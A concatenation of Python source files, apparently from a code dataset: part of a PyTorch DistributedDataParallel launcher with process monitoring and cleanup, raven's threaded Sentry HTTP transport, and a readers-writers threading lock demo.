        if torch.distributed.is_available():
            logger.info("Initializing ddp: GLOBAL_RANK: %s, WORLD_SIZE: %s", global_rank, self.world_size)
            store = self.hparams.store.initialize_object(is_main, state.world_size)
            torch.distributed.init_process_group(self.backend,
                                                 rank=global_rank,
                                                 world_size=self.world_size,
                                                 timeout=datetime.timedelta(seconds=self.hparams.timeout),
                                                 store=store)
            assert torch.distributed.is_initialized()
            assert state.is_rank_set, "state.is_rank_set should be set after torch.distributed is initialized"
            assert state.local_rank == global_rank % self.nproc_per_node, "state.local_rank is incorrect"
            assert state.nproc_per_node == self.nproc_per_node, "state.nproc_per_node is incorrect"
            assert state.global_rank == torch.distributed.get_rank(
            ), "state.global_rank != torch.distributed.get_rank()"
            logger.info("All DDP processes registered. world_size=%s.", self.world_size)
        logger.info("Starting process with global_rank=%s", global_rank)
        try:
            loop()
        finally:
            # Always tear down children and the process group, even if training raised.
            self.cleanup()

    def monitor(self) -> None:
        # Monitor checks whether any subprocesses have died unexpectedly
        alive_processes = set(self.processes)
        while len(alive_processes) > 0:
            finished_processes: List[subprocess.Popen[str]] = []
            for process in alive_processes:
                if process.poll() is None:
                    # the process is still running
                    continue
                else:
                    # return code of 0 implies clean exit
                    # return code of -9 implies sigkill, presumably from
                    # cleanup() in the main process
                    if process.pid in self.killed_pids or process.returncode == 0:
                        # exited cleanly
                        finished_processes.append(process)
                    else:
                        # NOTE(review): stdout/stderr are only non-None when the child
                        # was started with PIPE, so these reads usually yield "".
                        if process.stdout is None:
                            output = ""
                        else:
                            output = process.stdout.read()
                        if process.stderr is None:
                            stderr = ""
                        else:
                            stderr = process.stderr.read()
                        exc = subprocess.CalledProcessError(
                            process.returncode,
                            cmd=process.args,
                            output=output,
                            stderr=stderr,
                        )
                        if self.hparams.fork_rank_0:
                            # Launcher-only process: propagate the failure to the caller.
                            raise exc
                        else:
                            error_msg = [
                                "Error in subprocess",
                                "----------Subprocess STDOUT----------",
                                exc.output,
                                "----------Subprocess STDERR----------",
                                exc.stderr,
                            ]
                            logger.exception("\n".join(error_msg), exc_info=exc)
                            # NOTE(review): when monitor() runs on a daemon thread,
                            # sys.exit() only terminates that thread -- confirm whether
                            # a hard process exit was intended here.
                            sys.exit(process.returncode)
            alive_processes = set(alive_processes) - set(finished_processes)
            time.sleep(1)

    def cleanup(self) -> None:
        """Terminate any live children (SIGTERM, escalating to SIGKILL after
        CLEANUP_TIMEOUT) and destroy the torch.distributed process group."""
        for process in self.processes:
            process.poll()  # refresh .returncode; it is only updated by poll()/wait()
            if process.returncode is None:
                logger.info("Killing subprocess %s with SIGTERM", process.pid)
                self.killed_pids.add(process.pid)
                try:
                    # NOTE(review): killpg targets the process *group* with this id, but
                    # children are not started in their own groups (no start_new_session),
                    # so this likely raises ProcessLookupError -- confirm intent vs.
                    # process.terminate().
                    os.killpg(process.pid, signal.SIGTERM)
                except ProcessLookupError:
                    pass
        current_time = datetime.datetime.now()
        while datetime.datetime.now() - current_time < CLEANUP_TIMEOUT:
            # Fixed: poll() each child so .returncode updates, and a child counts as
            # finished when its returncode is NOT None. The previous version never
            # polled and had the condition inverted, so this grace-period loop
            # exited immediately without waiting.
            all_finished = all(p.poll() is not None for p in self.processes)
            if all_finished:
                break
            time.sleep(0.1)
        for process in self.processes:
            if process.returncode is None:
                logger.error("Failed to kill subprocess %s with SIGTERM, using SIGKILL instead", process.pid)
                self.killed_pids.add(process.pid)
                try:
                    os.killpg(process.pid, signal.SIGKILL)
                except ProcessLookupError:
                    pass
        if torch.distributed.is_initialized():
            torch.distributed.destroy_process_group()

    def prepare_module(self, module: Model) -> Model:
        """Wrap ``module`` in DistributedDataParallel when running under DDP.

        Modules with no trainable parameters are returned unwrapped, since DDP
        requires at least one parameter with ``requires_grad``.
        """
        if torch.distributed.is_available():
            if any((p.requires_grad for p in module.parameters())):
                ddp_model = DistributedDataParallel(module, find_unused_parameters=self.find_unused_parameters)
                return cast(Model, ddp_model)
            return module
        else:
            return module

    def create_dataloader(self, batch_size: int, dataloader_hparams: DataloaderHparams,
                          dataloader_spec: DataloaderSpec) -> DataLoader:
        """Build a dataloader, sharding the dataset across ranks when under DDP.

        Args:
            batch_size (int): per-process batch size.
            dataloader_hparams (DataloaderHparams): generic dataloader settings.
            dataloader_spec (DataloaderSpec): dataset and sampling configuration.

        Returns:
            DataLoader: wrapped in :class:`DDPDataLoader` when running distributed.
        """
        if torch.distributed.is_available():
            sampler = torch.utils.data.DistributedSampler[int](dataloader_spec.dataset,
                                                               drop_last=dataloader_spec.drop_last,
                                                               shuffle=dataloader_spec.shuffle)
        else:
            assert isinstance(dataloader_spec.dataset, collections.abc.Sized)
            sampler = torch.utils.data.RandomSampler(dataloader_spec.dataset, generator=dataloader_spec.generator)
        dataloader = dataloader_hparams.initialize_object(batch_size, sampler, dataloader_spec)
        if torch.distributed.is_available():
            # DDPDataLoader advances the sampler's epoch after each full pass.
            dataloader = DDPDataLoader(dataloader)
        return dataloader

    @contextmanager
    def ddp_sync_context(self, state: State, is_final_microbatch: bool):
        """Context manager controlling when DDP gradient synchronization happens
        during a (possibly micro-batched) backward pass; see :class:`DDPSyncStrategy`."""
        assert isinstance(state.model, DistributedDataParallel), "state.model is not wrapped by DDP"
        assert state.optimizers is not None, "optimizers have not been initialized"
        no_sync_context = cast(Callable[[], ContextManager], state.model.no_sync)
        auto_sync_context = nullcontext
        if self.ddp_sync_strategy == DDPSyncStrategy.SINGLE_AUTO_SYNC:
            # Let DDP sync automatically, but only on the final microbatch.
            context = auto_sync_context if is_final_microbatch else no_sync_context
            with context():
                yield
        elif self.ddp_sync_strategy == DDPSyncStrategy.MULTI_AUTO_SYNC:
            with auto_sync_context():
                yield
        elif self.ddp_sync_strategy == DDPSyncStrategy.FORCED_SYNC:
            try:
                with no_sync_context():
                    yield
            finally:
                if is_final_microbatch:
                    # Manually all-reduce and average every gradient exactly once.
                    for optimizer in ensure_tuple(state.optimizers):
                        for group in optimizer.param_groups:
                            for p in group["params"]:
                                if p.grad is not None:
                                    self.all_reduce(p.grad)
                                    p.grad = p.grad / state.world_size
        else:
            raise ValueError("Unknown sync strategy", self.ddp_sync_strategy)
@dataclass
class StoreHparams(hp.Hparams, ABC):
    """Abstract hyperparameters describing how to build the torch.distributed
    Store used to rendezvous the process group."""

    @abstractmethod
    def initialize_object(self, is_main: bool, world_size: int) -> torch.distributed.Store:
        """Construct the store.

        Args:
            is_main: True on the global rank-0 process (the store's server role,
                where the concrete store has one).
            world_size: total number of processes that will connect.
        """
        pass
@dataclass
class TCPStoreHparams(StoreHparams):
    """TCP-based store: rank 0 hosts the server the other ranks connect to."""
    host_name: str = hp.optional(doc="Rank 0 address", default="127.0.0.1")
    port: int = hp.optional(doc="Rank 0 port", default=43297)

    def initialize_object(self, is_main: bool, world_size: int) -> torch.distributed.Store:
        # is_main selects the server role (TCPStore's is_master positional argument).
        return torch.distributed.TCPStore(self.host_name, self.port, world_size, is_main)
@dataclass
class FileStoreHparams(StoreHparams):
    """Filesystem-based store: all ranks rendezvous through a shared file."""
    file_name: str = hp.required(doc="Path to store file")

    def initialize_object(self, is_main: bool, world_size: int) -> torch.distributed.Store:
        # FileStore has no server role, so is_main is intentionally unused here.
        return torch.distributed.FileStore(self.file_name, world_size)
@dataclass
class DDPHparams(hp.Hparams):
    """Hyperparameters for DDP: store choice, cluster topology, and the
    process-group initialization timeout."""

    # Maps the "store" field name to its selectable concrete implementations.
    hparams_registry = {
        "store": {
            "tcp": TCPStoreHparams,
            "file": FileStoreHparams,
        }
    }
    store: StoreHparams = hp.optional(doc="Store", default_factory=TCPStoreHparams)
    node_rank: int = hp.optional(doc="Node ID for multi-node training", default=0)
    num_nodes: int = hp.optional(doc="Number of nodes used for training", default=1)
    fork_rank_0: bool = hp.optional(
        doc="Whether to fork the local rank 0 process, or use the existing process for rank 0 training.",
        default=False,
    )
    timeout: float = hp.optional(doc="Timeout, in seconds, for initializing the DDP process group.", default=5.0)

    def initialize_object(self, nproc_per_node: int, backend: str, find_unused_parameters: bool) -> DDP:
        """Build a :class:`DDP` from these hyperparameters plus runtime-only settings
        (device count, backend, and the find_unused_parameters flag)."""
        return DDP(
            backend=backend,
            nproc_per_node=nproc_per_node,
            store_hparams=self.store,
            node_rank=self.node_rank,
            num_nodes=self.num_nodes,
            fork_rank_0=self.fork_rank_0,
            find_unused_parameters=find_unused_parameters,
            timeout=self.timeout,
        )
|
threaded.py | """
raven.transport.threaded
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import atexit
import logging
import time
import threading
import os
from raven.utils.compat import Queue
from raven.transport.base import HTTPTransport, AsyncTransport
DEFAULT_TIMEOUT = 10
logger = logging.getLogger('sentry.errors')
class AsyncWorker(object):
    """A background daemon thread that drains a queue of (callback, args, kwargs)
    jobs, used to ship Sentry events off the calling thread.

    An atexit hook gives pending messages a bounded amount of time to flush at
    interpreter shutdown.
    """

    # Sentinel object pushed onto the queue to tell the worker thread to stop.
    _terminator = object()

    def __init__(self, shutdown_timeout=DEFAULT_TIMEOUT):
        self._queue = Queue(-1)  # unbounded queue
        self._lock = threading.Lock()
        self._thread = None
        # Guard so the atexit hook is installed at most once per worker
        # (previously it was re-registered on every start() call, which ran
        # the shutdown handler multiple times after stop()/start() cycles).
        self._registered_atexit = False
        self.options = {
            'shutdown_timeout': shutdown_timeout,
        }
        self.start()

    def main_thread_terminated(self):
        """atexit hook: give queued messages a bounded chance to flush, then stop."""
        size = self._queue.qsize()
        if size:
            timeout = self.options['shutdown_timeout']
            print("Sentry is attempting to send %s pending error messages" % size)
            print("Waiting up to %s seconds" % timeout)
            if os.name == 'nt':
                print("Press Ctrl-Break to quit")
            else:
                print("Press Ctrl-C to quit")
            self.stop(timeout=timeout)

    def start(self):
        """
        Starts the task thread.
        """
        with self._lock:
            if not self._thread:
                self._thread = threading.Thread(target=self._target)
                # Daemon so a stuck worker cannot block interpreter exit.
                # (thread.daemon replaces the deprecated setDaemon().)
                self._thread.daemon = True
                self._thread.start()
            if not self._registered_atexit:
                atexit.register(self.main_thread_terminated)
                self._registered_atexit = True

    def stop(self, timeout=None):
        """
        Stops the task thread. Synchronous!
        """
        with self._lock:
            if self._thread:
                self._queue.put_nowait(self._terminator)
                self._thread.join(timeout=timeout)
                self._thread = None

    def queue(self, callback, *args, **kwargs):
        """Enqueue ``callback(*args, **kwargs)`` for execution on the worker thread."""
        self._queue.put_nowait((callback, args, kwargs))

    def _target(self):
        # Worker loop: run jobs until the terminator sentinel is received.
        while True:
            record = self._queue.get()
            if record is self._terminator:
                break
            callback, args, kwargs = record
            try:
                callback(*args, **kwargs)
            except Exception:
                logger.error('Failed processing job', exc_info=True)
            time.sleep(0)  # yield to other threads between jobs
class ThreadedHTTPTransport(AsyncTransport, HTTPTransport):
    """HTTP transport that hands sends off to a shared background AsyncWorker."""

    scheme = ['threaded+http', 'threaded+https']

    def __init__(self, parsed_url):
        super(ThreadedHTTPTransport, self).__init__(parsed_url)
        # remove the threaded+ from the protocol, as it is not a real protocol
        self._url = self._url.split('+', 1)[-1]

    def get_worker(self):
        # Lazily create a single worker per transport instance (EAFP).
        try:
            return self._worker
        except AttributeError:
            self._worker = AsyncWorker()
            return self._worker

    def send_sync(self, data, headers, success_cb, failure_cb):
        """Send on the calling thread, reporting the outcome via callbacks."""
        try:
            super(ThreadedHTTPTransport, self).send(data, headers)
        except Exception as exc:
            failure_cb(exc)
            return
        success_cb()

    def async_send(self, data, headers, success_cb, failure_cb):
        """Queue the send on the background worker and return immediately."""
        self.get_worker().queue(
            self.send_sync, data, headers, success_cb, failure_cb)
|
example3.py | import threading
def writer():
    # Writer side of the readers-writers demo: queue behind the entry lock,
    # then take exclusive ownership of the shared text while appending.
    global text
    while True:
        with service:  # entry lock keeps arrivals (readers and writers) roughly FIFO
            resource.acquire()  # exclusive access to the shared text
            print(f'Writing being done by {threading.current_thread().name}.')
            text += f'Writing was done by {threading.current_thread().name}. '
            resource.release()
def reader():
    # Reader side of a first-readers-writers scheme: the first reader in locks
    # out writers; the last reader out lets them back in. Statement order here
    # is the synchronization protocol -- do not reorder.
    global rcount
    while True:
        with service:  # pass through the entry lock so readers cannot starve writers
            rcounter.acquire()  # protect the shared reader count
            rcount += 1
            if rcount == 1:  # first reader in: block writers
                resource.acquire()
            rcounter.release()
        print(f'Reading being done by {threading.current_thread().name}:')
        #print(text)
        with rcounter:
            rcount -= 1
            if rcount == 0:  # last reader out: release writers
                resource.release()
# Shared state and the three locks used by the readers-writers demo.
text = 'This is some text. '
rcount = 0  # number of readers currently inside the critical section
rcounter = threading.Lock()  # guards rcount
resource = threading.Lock()  # exclusive access to text
service = threading.Lock()  # entry lock: keeps reader/writer arrivals roughly FIFO
# NOTE(review): these threads loop forever and are never joined, so the script
# runs until interrupted -- presumably intentional for a demo.
threads = [threading.Thread(target=reader) for i in range(3)] + [threading.Thread(target=writer) for i in range(2)]
for thread in threads:
    thread.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.